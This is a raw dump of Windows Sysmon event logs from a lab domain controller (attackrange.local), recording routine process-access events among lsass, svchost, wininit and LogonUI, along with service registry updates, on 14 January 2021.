13:08:50.027{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000555Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.027{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000554Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:50.027{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000629Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:51.918{08A6967A-40DF-6000-0C00-000000009901}4801108C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000628Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:51.918{08A6967A-40DF-6000-0C00-000000009901}4801108C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000627Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:51.918{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000626Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:51.918{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000625Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:51.918{08A6967A-40DF-6000-0C00-000000009901}4801108C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000624Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:51.918{08A6967A-40DF-6000-0C00-000000009901}4801108C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000623Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:51.918{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000622Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:51.918{08A6967A-40DF-6000-0C00-000000009901}4801108C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000621Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:51.918{08A6967A-40DF-6000-0C00-000000009901}4801108C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000620Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:51.918{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+5d917|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000619Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:51.918{08A6967A-40DF-6000-0C00-000000009901}4801108C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000618Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:51.918{08A6967A-40DF-6000-0C00-000000009901}4801108C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000617Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:51.918{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000616Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:51.918{08A6967A-40DF-6000-0C00-000000009901}4801108C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000615Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:51.918{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000649Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:08:52.196{08A6967A-40D1-6000-0100-000000009901}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\NextInstanceDWORD (0x0000001e) 13241300x8000000000000000648Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:08:52.196{08A6967A-40D1-6000-0100-000000009901}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\CountDWORD (0x0000001e) 12241200x8000000000000000647Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-DeleteValue2021-01-14 13:08:52.196{08A6967A-40D1-6000-0100-000000009901}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\30 13241300x8000000000000000646Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:08:52.196{08A6967A-40D1-6000-0100-000000009901}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000645Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:08:52.196{08A6967A-40D1-6000-0100-000000009901}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\CountDWORD (0x00000001) 12241200x8000000000000000644Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-DeleteValue2021-01-14 13:08:52.196{08A6967A-40D1-6000-0100-000000009901}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\1 10341000x8000000000000000643Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:52.156{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000642Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:52.156{08A6967A-40DF-6000-0C00-000000009901}4801108C:\Windows\system32\svchost.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000641Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:52.156{08A6967A-40DF-6000-0C00-000000009901}4801108C:\Windows\system32\svchost.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000640Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:08:52.153{08A6967A-40E0-6000-1100-000000009901}1204C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient\SpecialPollTimeRemainingBinary Data 13241300x8000000000000000639Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:08:52.153{08A6967A-40E0-6000-1100-000000009901}1204C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient\SpecialPollTimeRemainingBinary Data 13241300x8000000000000000638Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:08:52.152{08A6967A-40E0-6000-0F00-000000009901}1144C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Winmgmt\Parameters\ServiceDllUnloadOnStopDWORD (0x00000000) 10341000x8000000000000000637Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:52.027{08A6967A-40E0-6000-0E00-000000009901}10961344C:\Windows\system32\LogonUI.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\logoncontroller.dll+2dfb5|C:\Windows\System32\RPCRT4.dll+50d64|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000636Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:52.027{08A6967A-40DF-6000-0C00-000000009901}4801108C:\Windows\system32\svchost.exe{08A6967A-40DA-6000-0700-000000009901}724C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 